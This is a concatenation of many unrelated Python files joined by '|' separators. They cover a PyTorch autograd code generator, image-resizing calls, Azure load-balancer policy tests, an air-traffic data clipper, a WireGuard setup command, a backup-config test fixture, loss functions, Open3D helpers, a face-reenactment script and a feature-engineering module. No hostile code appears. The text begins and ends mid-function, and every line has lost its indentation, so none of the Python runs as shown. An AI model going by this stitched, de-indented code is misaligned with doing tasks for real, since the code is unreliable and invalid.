# See NOTE [ Treating Variables as non-Variables in type dispatch ] for details.
base_type_call = CALL_VIA_DERIVED.substitute(combined)
if not modifies_arguments and not returns_void:
rhs_value, extra_wrapping_stmts = wrap_output('tmp')
call = DISPATCH_TO_NON_VAR_TYPE_WITH_RETURN_VALUES.substitute(
base_type_call=base_type_call,
return_values=tie_return_values(),
rhs_value=rhs_value)
else:
call = DISPATCH_TO_NON_VAR_TYPE_WITHOUT_RETURN_VALUES.substitute(
base_type_call=base_type_call)
else:
call = CALL_VIA_TYPE.substitute(declaration)
if not modifies_arguments and not returns_void:
call = '{} = {}'.format(tie_return_values(), call)
call = call + ';'
for stmt in extra_wrapping_stmts:
call += '\n' + stmt
call = enforce_same_tensorimpl_and_storage(env, call)
return call
def tie_return_values():
if len(declaration['returns']) == 1:
return 'auto {}'.format(declaration['returns'][0]['name'])
names = [ret['name'] for ret in declaration['returns']]
return 'std::tie({})'.format(', '.join(names))
def get_return_value():
if inplace:
return 'self'
if is_out_fn:
return_names = [arg['name'] for arg in arguments
if arg.get('output', False)]
if len(return_names) == 1:
return return_names[0]
return 'std::forward_as_tuple({})'.format(', '.join(return_names))
returns = declaration['returns']
if len(returns) == 1:
return returns[0]['name']
moved = ['std::move({})'.format(r['name']) for r in returns]
return 'std::make_tuple({})'.format(', '.join(moved))
def emit_history():
fn = 'rebase' if modifies_arguments and view_info is None else 'set'
output_names = [r['name'] for r in differentiable_outputs]
# TODO: flatten allocates a std::vector, which could be expensive
outs = CodeTemplate("flatten_tensor_args( ${outs} )").substitute(outs=output_names)
return SET_HISTORY.substitute(fn=fn, differentiable_outputs=outs)
def emit_save_outputs():
if is_out_fn:
# out functions don't currently support differentiation
return ''
func = declaration['derivative']
if func is not None:
stmts = save_variables(func['saved_outputs'], True)
if len(stmts) == 0:
return ''
return CONDITIONAL.substitute(cond='grad_fn', statements=stmts)
return ''
def emit_check_inplace():
if not inplace:
return []
return ['check_inplace({});'.format(arg['name']) for arg in differentiable_outputs]
def emit_increment_version():
if not modifies_arguments:
return []
return ['increment_version({});'.format(arg['name']) for arg in differentiable_outputs]
def check_record_function_input_type(simple_type):
return simple_type in ['Tensor', 'Scalar']
def record_function_input_names():
return ', '.join([
arg['name'] for arg in declaration['arguments']
if check_record_function_input_type(arg['simple_type'])])
env = {}
combined = nested_dict(env, declaration)
body = []
if base_name not in DONT_PROFILE:
input_names = record_function_input_names()
body.append(
RECORD_FUNCTION.substitute(combined, input_names=input_names))
if strategy != 'use_type':
body.extend(unpack_args(env, declaration))
if requires_derivative:
body.extend(emit_check_inplace())
body.extend(setup_derivative(differentiable_inputs))
body.append(declare_returned_variables())
pre_record_trace, post_record_trace = emit_record_trace(env)
body.append(pre_record_trace)
body.append(emit_call(env))
if requires_derivative:
# set_flags has to appear after version_counter, because rebase_history
# requires that the counter is incremented before it is called
body.extend(emit_increment_version())
body.append(emit_history())
# post_record_trace must appear before save_outputs so that saved outputs
# have their tracing state saved (that is setup by recordTrace)
body.append(post_record_trace)
if requires_derivative:
body.append(emit_save_outputs())
if not returns_void:
body.append('return {};'.format(get_return_value()))
return body
def unpack_args(env, declaration):
def requires_unpack(arg):
return 'Tensor' in arg['dynamic_type']
body = []
unpacked_args = []
unpacked_args_simple_type = {}
for i, arg in enumerate(declaration['arguments']):
if not requires_unpack(arg):
unpacked_args.append(arg['name'])
unpacked_args_simple_type[arg['name']] = arg['simple_type']
continue
dynamic_type = arg['dynamic_type']
if 'TensorOptions' not in dynamic_type:
is_nullable = arg.get('is_nullable', False)
ref = (not is_nullable) and dynamic_type not in ['TensorList', 'SparseTensorRef']
suffix = '_opt' if is_nullable and dynamic_type != 'TensorList' else ''
body.append(UNPACK_TENSOR.substitute(
arg_name=arg['name'],
arg_pos=i,
suffix=suffix,
ref='&' if ref else '',
))
else:
# Okay, we are abusing the definition of 'unpack' here a bit,
# although it's stll getting the non-variable from the variable
# (in this case via TensorOptions rather than Variable/Tensor).
body.append(UNPACK_OPTIONS.substitute(arg_name=arg['name']))
unpacked_args.append(arg['name'] + '_')
unpacked_args_simple_type[arg['name'] + '_'] = arg['simple_type']
env['unpacked_args'] = unpacked_args
env['unpacked_args_simple_type'] = unpacked_args_simple_type
return body
def dispatch_strategy(declaration):
"""How are we going to call the underlying implementation of a
declaration? There are two strategies:
- use_derived: we want to call the implementation on CPUDoubleType
(or a similar, derived Type instance). Because these derived
instances deal in Tensors, not Variables (it's a completely different
object, so it doesn't dispatch back to VariableType), code on
this dispatch path needs to wrap/unwrap tensors. If the
derived implementation takes and returns tensors, the
implementation is usually differentiable (although we also use
the derived dispatch path for non-differentiable functions
that we still want to dispatch on the derived Type instance;
e.g., size())
- use_type: we want to call the implementation on Type, because
it is implemented concretely, and the functions it invokes will
get dispatched back to VariableType (which will ensure that they
are differentiable.)
"""
if (declaration['abstract'] or declaration['requires_tensor'] or
declaration['derivative'] is not None):
# If the function is abstract (not implemented on at::Type), we must
# call the implementation on the derived type with unpacked tensors.
# If the function has a derivative specified and is concrete, we could
# call either implementation. We prefer the calling the derived
# type's implementation with unpacked tensors because it is more
# performant in some cases: any internal calls to other ATen functions
# won't have the history tracked.
# If the function has a type dispatched argument (i.e. is a factory),
# we prefer calling the derived type's implementation both because it is
# more performant and to ensure factory functions return tensors with _version
# of 0 (probably not strictly necessary, but nice to have to keeps versions simple
# to understand.
return 'use_derived'
else:
# If the function is concrete (we don't have to override it) and we
# didn't declare it in derivatives.yaml, we'll assume that it is
# actually implemented out of differentiable functions. (This
# assumption might not hold, but then you'll see gradcheck fail.)
return 'use_type'
|
import os
from transmogrify import Transmogrify
square_img = os.path.abspath(os.path.join(os.path.dirname(__file__), 'testdata', 'square_img.jpg'))
vert_img = os.path.abspath(os.path.join(os.path.dirname(__file__), 'testdata', 'vert_img.jpg'))
horiz_img = os.path.abspath(os.path.join(os.path.dirname(__file__), 'testdata', 'horiz_img.jpg'))
####
#### AutoCrop
####
Transmogrify(square_img, [('a', '100x100'),]).save()
Transmogrify(vert_img, [('a', '100x100'),]).save()
Transmogrify(horiz_img, [('a', '100x100'),]).save()
####
#### Thumbnail
####
Transmogrify(square_img, [('t', '200'),]).save()
Transmogrify(vert_img, [('t', '200'),]).save()
Transmogrify(horiz_img, [('t', '200'),]).save()
Transmogrify(square_img, [('t', 'x200'),]).save()
Transmogrify(vert_img, [('t', 'x200'),]).save()
Transmogrify(horiz_img, [('t', 'x200'),]).save()
Transmogrify(square_img, [('t', '200x200'),]).save()
Transmogrify(vert_img, [('t', '200x200'),]).save()
Transmogrify(horiz_img, [('t', '200x200'),]).save()
####
#### Resize
####
Transmogrify(square_img, [('r', '500'),]).save()
Transmogrify(vert_img, [('r', '500'),]).save()
Transmogrify(horiz_img, [('r', '500'),]).save()
Transmogrify(square_img, [('r', 'x500'),]).save()
Transmogrify(vert_img, [('r', 'x500'),]).save()
Transmogrify(horiz_img, [('r', 'x500'),]).save()
Transmogrify(square_img, [('r', '500x500'),]).save()
Transmogrify(vert_img, [('r', '500x500'),]).save()
Transmogrify(horiz_img, [('r', '500x500'),]).save()
####
#### Letterbox
####
Transmogrify(square_img, [('l', '500x500-f00'),]).save()
Transmogrify(vert_img, [('l', '500x500-f00'),]).save()
Transmogrify(horiz_img, [('l', '500x500-f00'),]).save()
Transmogrify(square_img, [('l', '500x500-fffee1'),]).save()
Transmogrify(vert_img, [('l', '500x500-fffee1'),]).save()
Transmogrify(horiz_img, [('l', '500x500-fffee1'),]).save()
####
#### ForceFit
####
Transmogrify(square_img, [('s', '300x300'),]).save()
Transmogrify(vert_img, [('s', '300x300'),]).save()
Transmogrify(horiz_img, [('s', '300x300'),]).save()
####
#### Crop
####
Transmogrify(square_img, [('c', '100x100'),]).save()
Transmogrify(vert_img, [('c', '100x100'),]).save()
Transmogrify(horiz_img, [('c', '100x100'),]).save()
####
#### Filter
####
Transmogrify(square_img, [('r', '300x300'), ('f', 'blur')]).save()
Transmogrify(square_img, [('r', '300x300'), ('f', 'contour')]).save()
Transmogrify(square_img, [('r', '300x300'), ('f', 'detail')]).save()
Transmogrify(square_img, [('r', '300x300'), ('f', 'edge_enhance')]).save()
Transmogrify(square_img, [('r', '300x300'), ('f', 'edge_enhance_more')]).save()
Transmogrify(square_img, [('r', '300x300'), ('f', 'emboss')]).save()
Transmogrify(square_img, [('r', '300x300'), ('f', 'find_edges')]).save()
Transmogrify(square_img, [('r', '300x300'), ('f', 'smooth')]).save()
Transmogrify(square_img, [('r', '300x300'), ('f', 'smooth_more')]).save()
Transmogrify(square_img, [('r', '300x300'), ('f', 'sharpen')]).save()
####
#### Border
####
Transmogrify(square_img, [('r', '300x300'), ('b', '3-fffee1')]).save()
|
# Copyright 2015-2018 Capital One Services, LLC
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
from ..azure_common import BaseTest, arm_template
class LoadBalancerTest(BaseTest):
def setUp(self):
super(LoadBalancerTest, self).setUp()
def test_load_balancer_schema_validate(self):
with self.sign_out_patch():
p = self.load_policy({
'name': 'test-load-balancer',
'resource': 'azure.loadbalancer',
'filters': [
{'type': 'frontend-public-ip',
'key': 'properties.publicIPAddressVersion',
'op': 'in',
'value_type': 'normalize',
'value': 'ipv4'}
]
}, validate=True)
self.assertTrue(p)
@arm_template('load-balancer.json')
def test_find_by_name(self):
p = self.load_policy({
'name': 'test-azure-loadbalancer',
'resource': 'azure.loadbalancer',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'cctestloadbalancer'}],
})
resources = p.run()
self.assertEqual(len(resources), 1)
@arm_template('load-balancer.json')
def test_find_by_frontend_ip(self):
p = self.load_policy({
'name': 'test-loadbalancer-with-ipv6-frontend',
'resource': 'azure.loadbalancer',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'cctestloadbalancer'},
{'type': 'frontend-public-ip',
'key': 'properties.publicIPAddressVersion',
'op': 'in',
'value_type': 'normalize',
'value': 'ipv4'}],
})
resources = p.run()
self.assertEqual(len(resources), 1)
|
import argparse
from concurrent.futures import ProcessPoolExecutor, as_completed
from pathlib import Path
from tqdm import tqdm
from traffic.core import Sector # for typing
from traffic.data import airac as sectors
from traffic.data.so6 import SO6
def clip(so6: SO6, sector: Sector) -> SO6:
return so6.inside_bbox(sector).intersects(sector)
def unpack_and_clip(filename: str, sectorname: str) -> SO6:
so6 = SO6.parse_so6(filename)
sector = sectors[sectorname]
if sector is None:
raise ValueError("Sector not found")
return clip(so6, sector)
def prepare_all(filename: Path, output_dir: Path, sectorname: str) -> None:
so6 = unpack_and_clip(filename.as_posix(), sectorname)
output_name = filename.with_suffix(".pkl").name
so6.to_pkl((output_dir / output_name).as_posix())
def glob_all(
directory: Path, output_dir: Path, sectorname: str, max_workers: int = 4
) -> None:
if not directory.is_dir():
raise ValueError(f"Directory {directory} does not exist")
if not output_dir.is_dir():
output_dir.mkdir(parents=True)
with ProcessPoolExecutor(max_workers=max_workers) as executor:
tasks = {
executor.submit(
prepare_all, filename, output_dir, sectorname
): filename
for filename in directory.glob("**/*.so6")
}
for future in tqdm(as_completed(tasks), total=len(tasks)):
try:
future.result()
except Exception as e:
print(f"Exception {e} occurred on file {tasks[future]}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Clip SO6 on sector")
parser.add_argument(
"-d", dest="directory", type=Path, help="directory containing so6 files"
)
parser.add_argument(
"-o",
dest="output_dir",
type=Path,
help="output directory for pkl files",
)
parser.add_argument(
"-s",
dest="sector_name",
help="name of the sector to pick in AIRAC files",
)
parser.add_argument(
"-t",
dest="max_workers",
default=4,
type=int,
help="number of parallel processes",
)
args = parser.parse_args()
glob_all(**vars(args))
|
'''
Pytorch implementation for Inception ResNet v2.
Original paper: https://arxiv.org/pdf/1602.07261.pdf
'''
# import torch
# import torch.nn as nn
# from torch.autograd import Variable
|
from django.core.management.base import BaseCommand
from django_wireguard.models import WireguardInterface
class Command(BaseCommand):
help = 'Setup WireGuard interface'
def add_arguments(self, parser):
parser.add_argument('name', type=str)
parser.add_argument('--listen-port', nargs='?', type=int, default=1194)
parser.add_argument('--private-key', nargs='?', type=str)
parser.add_argument('--address', nargs='*', type=str)
def handle(self, *args, **options):
interface = WireguardInterface.objects.filter(name=options['name'])
address = ','.join(options['address'] or [])
if interface.exists():
if options['private_key']:
interface.update(listen_port=options['listen_port'],
private_key=options['private_key'],
address=address)
else:
interface.update(listen_port=options['listen_port'],
address=address)
self.stderr.write(self.style.SUCCESS(f"Interface updated: {interface.first().name}.\n"))
else:
interface = WireguardInterface.objects.create(name=options['name'],
listen_port=options['listen_port'],
private_key=options['private_key'],
address=address)
self.stderr.write(self.style.SUCCESS(f"Interface created: {interface.name}.\n"))
|
import pytest
@pytest.fixture
def cache_dir(tmpdir):
cache_path = tmpdir.mkdir('cache')
return cache_path
@pytest.fixture
def config_content():
return """
[source]
backup_dirs=/ /root/ /etc "/dir with space/" '/dir foo'
backup_mysql=yes
[destination]
backup_destination={destination}
keep_local_path=/var/backup/local
[s3]
AWS_ACCESS_KEY_ID="XXXXX"
AWS_SECRET_ACCESS_KEY="YYYYY"
AWS_DEFAULT_REGION="us-east-1"
BUCKET="twindb-backups"
[mysql]
mysql_defaults_file=/etc/twindb/my.cnf
expire_log_days = 8
[ssh]
ssh_user="root"
ssh_key=/root/.ssh/id_rsa
port={port}
backup_host='127.0.0.1'
backup_dir=/tmp/backup
[retention]
hourly_copies=24
daily_copies=7
weekly_copies=4
monthly_copies=12
yearly_copies=3
"""
|
#%%
import torch
import numpy as np
def VecLoss(vec_tar,vec):
vec_norm = torch.linalg.norm(vec,dim=1)
vec = vec/ (vec_norm.unsqueeze(1))
vec_tar_norm = torch.linalg.norm(vec_tar,dim=1)
vec_tar = vec_tar/ (vec_tar_norm.unsqueeze(1))
# check dot product
loss = vec * vec_tar
loss = torch.sum(loss)
loss = -loss
return loss
def Pos_norm2(output, label):
output = output[:,:,0:3,3]
output = output.reshape(-1,output.size()[1]*output.size()[2])
loss = torch.sqrt(torch.nn.MSELoss()(output,label))
# print(output, label)
return loss
def q_entropy(q_value):
loss = torch.distributions.Categorical(q_value).entropy()
loss = -loss
return loss
|
# Open3D: www.open3d.org
# The MIT License (MIT)
# See license file or visit www.open3d.org for details
import copy
from py3d import *
from os import listdir, makedirs
from os.path import exists, isfile, join, splitext
#######################
# some global parameters for the global registration
#######################
n_frames_per_fragment = 100
n_keyframes_per_n_frame = 5
#######################
# file related
#######################
folder_fragment = "/fragments/"
template_fragment_posegraph = folder_fragment + "fragment_%03d.json"
template_fragment_posegraph_optimized = folder_fragment + \
"fragment_optimized_%03d.json"
template_fragment_mesh = folder_fragment + "fragment_%03d.ply"
folder_scene = "/scene/"
template_global_posegraph = folder_scene + "global_registration.json"
template_global_posegraph_optimized = folder_scene + \
"global_registration_optimized.json"
template_global_mesh = folder_scene + "integrated.ply"
def get_file_list(path, extension=None):
if extension is None:
file_list = [path + f for f in listdir(path) if isfile(join(path, f))]
else:
file_list = [path + f for f in listdir(path)
if isfile(join(path, f)) and splitext(f)[1] == extension]
file_list.sort()
return file_list
def get_rgbd_file_lists(path_dataset):
path_color = path_dataset + "/image/"
path_depth = path_dataset + "/depth/"
color_files = get_file_list(path_color, ".jpg") + \
get_file_list(path_color, ".png")
depth_files = get_file_list(path_depth, ".png")
return color_files, depth_files
def make_folder(path_folder):
if not exists(path_folder):
makedirs(path_folder)
#######################
# visualization related
#######################
flip_transform = [[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]]
def draw_registration_result(source, target, transformation):
source_temp = copy.deepcopy(source)
target_temp = copy.deepcopy(target)
source_temp.paint_uniform_color([1, 0.706, 0])
target_temp.paint_uniform_color([0, 0.651, 0.929])
source_temp.transform(transformation)
source_temp.transform(flip_transform)
target_temp.transform(flip_transform)
draw_geometries([source_temp, target_temp])
def draw_registration_result_original_color(source, target, transformation):
source_temp = copy.deepcopy(source)
target_temp = copy.deepcopy(target)
source_temp.transform(transformation)
source_temp.transform(flip_transform)
target_temp.transform(flip_transform)
draw_geometries([source_temp, target_temp])
|
from sfa_dash.conftest import BASE_URL
def test_get_no_arg_routes(client, no_arg_route):
resp = client.get(no_arg_route, base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_site_filtered_no_args(client, no_arg_route, site_id):
resp = client.get(no_arg_route, base_url=BASE_URL,
query_string={'site_id': site_id})
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_aggregate_filtered_no_args(client, no_arg_route, aggregate_id):
resp = client.get(no_arg_route, base_url=BASE_URL,
query_string={'aggregate_id': aggregate_id})
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_get_observation_routes(client, observation_id_route, observation_id):
resp = client.get(observation_id_route(observation_id), base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_get_forecast_routes(client, forecast_id_route, forecast_id):
resp = client.get(forecast_id_route(forecast_id), base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_get_site_routes(client, site_id_route, site_id):
resp = client.get(site_id_route(site_id), base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_get_cdf_forecast_routes(
client, cdf_forecast_id_route, cdf_forecast_group_id):
resp = client.get(cdf_forecast_id_route(cdf_forecast_group_id),
base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_get_cdf_forecast_single_routes(
client, cdf_forecast_single_id_route, cdf_forecast_id):
resp = client.get(cdf_forecast_single_id_route(cdf_forecast_id),
base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_admin_route_list(client, admin_route):
resp = client.get(admin_route, base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_admin_multiarg_route_list(
client, admin_multiarg_route, permission_id, role_id, user_id,
valid_permission_object_id):
resp = client.get(
admin_multiarg_route(
valid_permission_object_id,
permission_id,
user_id,
role_id),
base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_user_id_routes(client, user_id_route, user_id):
resp = client.get(user_id_route(user_id), base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_permission_id_routes(client, permission_id_route, permission_id):
resp = client.get(permission_id_route(permission_id), base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_role_id_routes(client, role_id_route, role_id):
resp = client.get(role_id_route(role_id), base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_aggregate_id_routes(client, aggregate_id_route, aggregate_id):
resp = client.get(aggregate_id_route(aggregate_id), base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_report_id_routes(client, report_id_route, report_id):
resp = client.get(report_id_route(report_id), base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_clone_routes(client, clone_route, all_metadata_ids):
resp = client.get(clone_route(all_metadata_ids), base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
|
from http import HTTPStatus
from exception.error_code import ErrorCode
from exception.base_exception import BaseException
class UnauthorizedException(BaseException):
"""
401 Unauthorized
"""
def __init__(self, error_code: ErrorCode):
super().__init__(HTTPStatus.UNAUTHORIZED, error_code)
|
import torch
import torchvision.models as tvmodels
from .cifar_resnet import ResNet
from .mlp import MLP
def construct_model(args):
if args.model_name == 'resnet50':
model = tvmodels.resnet.resnet50(False)
elif args.model_name == 'resnet56':
model = ResNet()
elif args.model_name == 'MLP':
model = MLP()
else:
raise NotImplementedError
# default distribution, normalized version
distribution = torch.Tensor(args.num_classes).fill_(1)
if args.resume_model is not None:
resume_model = torch.load(
args.resume_model, map_location=lambda storage, loc: storage)
# model containing distribution
if 'distribution' in resume_model.keys():
distribution = resume_model['distribution']
resume_model = resume_model['model']
print('==> Resume distribution')
model.load_state_dict(resume_model)
print('==> Resume from model {}.'.format(args.resume_model))
else:
print('==> Not init network!')
return model, distribution
|
# coding: utf-8
# Copyright 2018 LINE Corporation
#
# LINE Corporation licenses this file to you under the Apache License,
# version 2.0 (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at:
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import division, print_function, absolute_import
from .version import version as __version__
from .core import *
from .clova import *
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from mm.utils.mesh import generateFace
from mm.utils.transform import rotMat2angle
from mm.utils.io import importObj, speechProc
from mm.models import MeshModel
from mm.utils.visualize import animate
import glob, os, json
import numpy as np
from sklearn.neighbors import NearestNeighbors
from sklearn.preprocessing import StandardScaler
import networkx as nx
if __name__ == "__main__":
# Change to relevant data directory
os.chdir('/home/leon/f2f-fitting/data/obama/')
# Specify file name of shiro audio file, number of frames in shiro video, and shiro video FPS
fNameSiro = 'siroNorm.wav'
numFramesSiro = 2882 #3744 #2260
fpsSiro = 24
# Process audio features for the source (shiro) audio file
siroAudioVec, timeVecVideo = speechProc(fNameSiro, numFramesSiro, fpsSiro, return_time_vec = True)
# Create a kNN fitter to find the k closest siro audio features
k = 20
NN = NearestNeighbors(n_neighbors = k, metric = 'l2')
NN.fit(siroAudioVec.T)
"""
Initialize 3DMM, relevant OpenPose landmark indices, etc.
"""
# Load 3DMM
m = MeshModel('../../models/bfm2017.npz')
# Load 3DMM parameters for the shiro video, scaling some for a distance measure
scaler = StandardScaler()
param = np.load('paramRTS2Orig.npy') # Parameters to orthographically project 3DMM onto shiro frame images
expCoef = scaler.fit_transform(param[:, m.numId: m.numId + m.numExp])
angles = param[:, m.numId + m.numExp: m.numId + m.numExp + 3]
trans = scaler.fit_transform(param[:, m.numId + m.numExp + 3: m.numId + m.numExp + 5])
R = np.empty((numFramesSiro, 3, 3))
for i in range(numFramesSiro):
R[i, ...] = rotMat2angle(angles[i, :])
# Load OpenPose 2D landmarks for the siro video
lm = np.empty((numFramesSiro, 70, 2))
for i in range(numFramesSiro):
with open('landmark/' + '{:0>5}'.format(i+1) + '.json', 'r') as fd:
lm[i, ...] = np.array([l[0] for l in json.load(fd)], dtype = int).squeeze()[:, :2]
# These pairs of OpenPose landmark indices correspond to certain features that we want to measure, such as the distance between the lower and upper lips, eyelids, etc.
targetLMPairs = np.array([[42, 47], [43, 46], [44, 45], [30, 36], [42, 45], [44, 47], [25, 29], [26, 28], [19, 23], [20, 22]])
# Get corresponding landmark pairs on the 3DMM
sourceLMPairs = m.sourceLMInd[targetLMPairs]
# Get the unique landmarks in these landmark pairs
uniqueSourceLM, uniqueInv = np.unique(sourceLMPairs, return_inverse = True)
# Load mouth region from 3DMM for animation
mouthIdx = np.load('../../models/bfmMouthIdx.npy')
mouthVertices = np.load('mouthVertices.npy')
mouthFace = importObj('mouth.obj', dataToImport = ['f'])
"""
Loop through the kuro (target) audio files of interest and find the shortest path sequence of shiro video frames to reenact the target audio file
"""
# Loop through each target audio file
for fNameKuro in glob.glob('condition_enhanced/cleaned/*.wav'):
fNameKuro = 'condition_enhanced/cleaned/7_EJF101_ESPBOBAMA1_00101_V01_T01.wav'
kuroAudioVec = speechProc(fNameKuro, numFramesSiro, fpsSiro, kuro = True)
numFramesKuro = kuroAudioVec.shape[1]
distance, ind = NN.kneighbors(kuroAudioVec.T)
# Enforce similarity in similarity transform parameters from candidate frames to original video frames
Dp = np.empty((numFramesKuro, k))
for q in range(numFramesKuro):
c = ind[q, :]
Dp[q, :] = np.linalg.norm(trans[q, :] - trans[c, :], axis = 1) + np.linalg.norm(R[q, ...] - R[c, ...], axis = (1, 2))
# Transition between candidate frames should have similar 3DMM landmarks and expression parameters
mmLm = np.empty((numFramesSiro, 3, uniqueSourceLM.size))
for t in range(numFramesSiro):
mmLm[t] = generateFace(param[t, :], m, ind = uniqueSourceLM)
mmLm = mmLm[..., uniqueInv[::2]] - mmLm[..., uniqueInv[1::2]]
mmLmNorm = np.linalg.norm(mmLm, axis = 1)
Dm = np.empty((numFramesKuro - 1, k, k))
weights = np.empty((numFramesKuro - 1, k, k))
for t in range(numFramesKuro - 1):
for c1 in range(k):
Dm[t, c1] = np.linalg.norm(mmLmNorm[ind[t, c1], :] - mmLmNorm[ind[t+1, :], :], axis = 1) + np.linalg.norm(expCoef[ind[t, c1]] - expCoef[ind[t+1, :], :], axis = 1)
# np.exp(-np.fabs(timeVecVideo[ind[t, c1]] - timeVecVideo[ind[t+1, :]])**2)
weights[t, c1] = Dm[t, c1] + Dp[t, c1] + Dp[t+1, :] + distance[t, c1] + distance[t+1, :]
# Create DAG and assign edge weights from distance matrix
G = nx.DiGraph()
for i in range(numFramesKuro - 1):
left = np.arange(i*k, (i+1)*k)
right = np.arange((i+1)*k, (i+2)*k)
G.add_nodes_from(left)
G.add_nodes_from(right)
G.add_weighted_edges_from((u, v, weights[i, u - i*k, v - (i+1)*k]) for u in left for v in right)
# Use A* shortest path algorithm to find the distances from each of the k source nodes to each of the k terminal nodes
astarLength = np.empty((k, k))
for s in range(k):
for t in range(k):
astarLength[s, t] = nx.astar_path_length(G, s, right[t])
# Find the optimal path with the minimum distance of the k^2 paths calculated above
s, t = np.unravel_index(astarLength.argmin(), (k, k))
optPath = nx.astar_path(G, s, right[t])
optPath = np.unravel_index(optPath, (numFramesKuro, k))
optPath = ind[optPath[0], optPath[1]]
# Save the optimal path of shiro video frame indices as an .npy file
# if not os.path.exists('graphOptPath'):
# os.makedirs('graphOptPath')
# np.save('graphOptPath/' + os.path.splitext(os.path.basename(fNameKuro))[0], optPath)
# Animate the reenactment and save
v = mouthVertices.reshape((numFramesSiro, 3, mouthIdx.size), order = 'F')
animate(v[optPath], mouthFace, 'temp/' + os.path.splitext(os.path.basename(fNameKuro))[0], m.texMean[:, mouthIdx])
break
|
import warnings
import pandas as pd
import numpy as np
import time
from autox.autox_server.util import log
from tqdm import tqdm
warnings.filterwarnings('ignore')
from sklearn.feature_extraction.text import CountVectorizer
from pypinyin import pinyin, lazy_pinyin, Style
def str2map(s):
if str(s) == 'None':
return {}
return {si.split(':')[0]: si.split(':')[1] for si in s.split(',')}
def get_keys(kv):
return list(kv.keys())
def fe_kv(G_df_dict, G_data_info, G_hist, is_train, remain_time, AMPERE):
# 对G_df_dict['BIG']表做扩展特征
start = time.time()
log('[+] feature engineer, kv')
if is_train:
G_hist['FE_kv'] = {}
G_hist['FE_kv']['cols'] = []
G_hist['FE_kv']['col_top_keys'] = {}
cols_kv = [x for x in G_hist['big_cols_kv'] if x in G_df_dict['BIG'].columns]
G_hist['FE_kv']['cols'] = cols_kv
log("kv features: {}".format(G_hist['FE_kv']['cols']))
for col in cols_kv:
temp = G_df_dict['BIG'][[col]].copy()
temp[col] = temp[col].apply(lambda x: str2map(x))
temp[col + '_keys'] = temp[col].apply(lambda x: get_keys(x))
vectorizer = CountVectorizer(max_features=100)
vectorizer.fit_transform(temp[col + '_keys'].astype(str))
G_hist['FE_kv']['col_top_keys'][col] = vectorizer.get_feature_names()
if not AMPERE:
G_df_dict['FE_kv'] = pd.DataFrame()
for col in tqdm(G_hist['FE_kv']['cols']):
for key_ in G_hist['FE_kv']['col_top_keys'][col]:
temp = G_df_dict['BIG'][[col]].copy()
temp[col] = temp[col].apply(lambda x: str2map(x))
try:
G_df_dict['FE_kv'][f"{col}__{key_}__kv"] = temp[col].apply(lambda x: float(x.get(key_, np.nan)))
except:
pass
G_hist['FE_kv']['rename'] = {}
cols_name = []
for i, col in enumerate(G_df_dict['FE_kv'].columns):
